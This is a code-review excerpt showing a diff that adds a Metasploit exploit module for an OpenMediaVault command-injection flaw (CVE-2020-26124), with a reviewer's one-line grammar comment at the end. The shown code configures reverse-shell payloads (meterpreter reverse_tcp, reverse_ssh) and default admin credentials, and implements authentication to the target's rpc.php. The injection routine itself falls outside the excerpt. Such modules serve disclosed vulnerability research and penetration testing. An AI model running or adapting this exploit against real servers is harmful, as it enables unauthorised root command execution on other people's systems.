modules/exploits/unix/webapp/openmediavault_rpc_rce.rb

```diff
@@ -0,0 +1,216 @@
+          POST parameter of the `rpc.php` page, because `json_encode_safe()`
+          is not used in config/databasebackend.inc.
+          Successful exploitation grants attackers to perform arbitrary
+          command execution on the underlying operating system as root.
+        },
+        'Author' => [
+          'Anastasios Stasinopoulos (@ancst)' # Obrela Labs Team - Discovery and Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2020-26124'],
+          ['URL', 'https://www.openmediavault.org/?p=2797']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => 'Sep 28 2020',
+        'Targets' =>
+          [
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_ssh' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault installation', '/']),
+        OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault'])
+      ]
+    )
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def login(user, pass, _opts = {})
+    print_status("#{peer} - Authenticating with OpenMediaVault using #{user}:#{pass}...")
+    @uri = normalize_uri(target_uri.path, '/rpc.php')
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => {
+        "service": 'Session',
+        "method": 'login',
+        "params": {
+          "username": user.to_s,
+          "password": pass.to_s
+        },
+        "options": nil
+      }.to_json
+    })
+    unless res
+      # We return nil here, as callers should handle this case
+      # specifically with their own unique error message.
+      return nil
+    end
+
+    if res.code == 200 && res.body.scan('"authenticated":true,').flatten.first && res.get_cookies.scan(/X-OPENMEDIAVAULT-SESSIONID=(\w+);*/).flatten.first
+      @cookie = res.get_cookies
+    end
+    return res
+  rescue ::Rex::ConnectionError
+    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
```

Comment:
`in the login() method.` would make more gramatical sense. Missing the linking `the` in this sentence.